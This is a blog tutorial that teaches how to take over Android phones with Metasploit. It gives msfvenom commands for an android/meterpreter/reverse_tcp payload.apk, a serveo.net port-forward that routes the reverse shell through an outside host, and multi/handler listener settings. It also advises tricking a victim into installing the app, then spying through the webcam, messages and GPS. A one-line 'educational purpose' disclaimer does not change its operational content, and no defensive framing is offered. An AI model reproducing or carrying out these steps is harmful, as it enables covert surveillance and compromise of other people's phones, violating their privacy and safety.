Tuesday, August 25, 2020

Breaking into android

  




Hello all, As we know the large part of society is using smart phones , without knowing its adverse disadvantages on their privacy. So  today i am going to teach you how to hack android devices with the Metasploit framework on different network.

After getting meterpreter session attacker can do many thing such as:
  • hack camera live stream.
  • take screen shots of mobile display.
  • hack msgs.
  • call from your number.
  • gps location.
  • hacking another devices etc.
PRE-REQUIREMENT:-
  1. Kali OS
  2. Updated Metasploit Framework.
  3. Social Engineering. 
This blog is for educational purpose and not responsible for illegal activities .

1.Get the ip address of your network.
for this enter the following command in terminal. 

  • ifconfig

As you can see my ip address is 192.168.23.168 and your may be different from me.

2.Host your local host on internet by port forwarding on serveo.net.
 syntax:-   ssh -R src_port:ip_address:dest_port serveo.net
example
  • ssh -R  8565:192.168.23.168:4444

this basically forward the request to your ip address from serveo.net.

3.Make a payload using msfvenom.
  • msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=8565 -o payload.apk 
4.Open a listener to get the meterpreter session.
type :- 
  • msfconsole
  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp 
  • set lhost ip-add
  • set lport 4444
  • run
5.Social engineering 
send it to your victim by any way and install payload.apk in victim android mobile.
Once it installed and open by victim the meterpreter session has been established as shown below.

6.Exploit 
type :
  • help 
as you can see all the command are given.you can do whatever you want.



Example:-
i want the victim camera's live stream 
type  
  • webcame_list //this will give you the list of webcam present on your victim machine. 
  • webcam_stream 1  //will give you the live stream as shown below.



No comments:

Post a Comment